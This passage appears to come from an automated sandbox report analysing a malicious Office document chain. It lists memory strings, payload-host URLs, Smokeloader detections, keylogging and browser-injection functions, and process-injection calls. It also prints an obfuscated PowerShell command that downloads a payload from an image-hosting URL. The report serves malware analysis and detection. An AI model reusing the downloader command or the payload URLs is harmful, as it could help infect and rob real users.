              Source: powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wscript.exe, 00000009.00000003.419004224.000000000089B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.421806402.000000000089B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.419004224.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Bo3r4
              Source: wscript.exe, 00000009.00000003.419004224.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.0000000000816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Bo3r4gj
              Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/e
              Source: wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/n
              Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
              Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
              Source: powershell.exe, 0000000C.00000002.454053406.00000000023DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
              Source: powershell.exe, 0000000C.00000002.458120444.0000000004F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: F8D.tmp.18.drString found in binary or memory: https://www.google.com/favicon.ico
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
              Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
              Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49172 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3192, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_000C162B GetKeyboardState,ToUnicode,28_2_000C162B

              E-Banking Fraud

              barindex
              Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe22_2_00082EA8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe22_2_00083862
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe22_2_00083862
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe22_2_00083862
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe22_2_00083862

              System Summary

              barindex
              Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: #20240627_Edlen_A.xlsOLE: Microsoft Excel 2007+
              Source: 26330000.0.drOLE: Microsoft Excel 2007+
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nXPJ.urlJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.urlJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8798
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8798Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgIDJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,13_2_00402321
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004025D3 NtClose,13_2_004025D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014D6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014EB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402686 NtClose,13_2_00402686
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,wcsstr,13_2_0040328D
              Source: C:\Windows\explorer.exeCode function: 14_2_03F14760 NtCreateSection,14_2_03F14760
              Source: C:\Windows\explorer.exeCode function: 14_2_03F12FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle,14_2_03F12FAC
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00084B92 RtlMoveMemory,NtUnmapViewOfSection,18_2_00084B92
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000833C3 NtQueryInformationFile,18_2_000833C3
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008342B NtQueryObject,NtQueryObject,RtlMoveMemory,18_2_0008342B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,18_2_0008349B
              Source: C:\Windows\explorer.exeCode function: 19_2_000638B0 NtUnmapViewOfSection,19_2_000638B0
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_00081016 RtlMoveMemory,NtUnmapViewOfSection,21_2_00081016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,22_2_00083D8D
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00082E1B OpenProcess,lstrcmpi,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,22_2_00082E1B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081F4E NtCreateSection,NtMapViewOfSection,22_2_00081F4E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081FE5 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_00081FE5
              Source: C:\Windows\explorer.exeCode function: 23_2_000E5300 RtlAllocateHeap,NtUnmapViewOfSection,23_2_000E5300
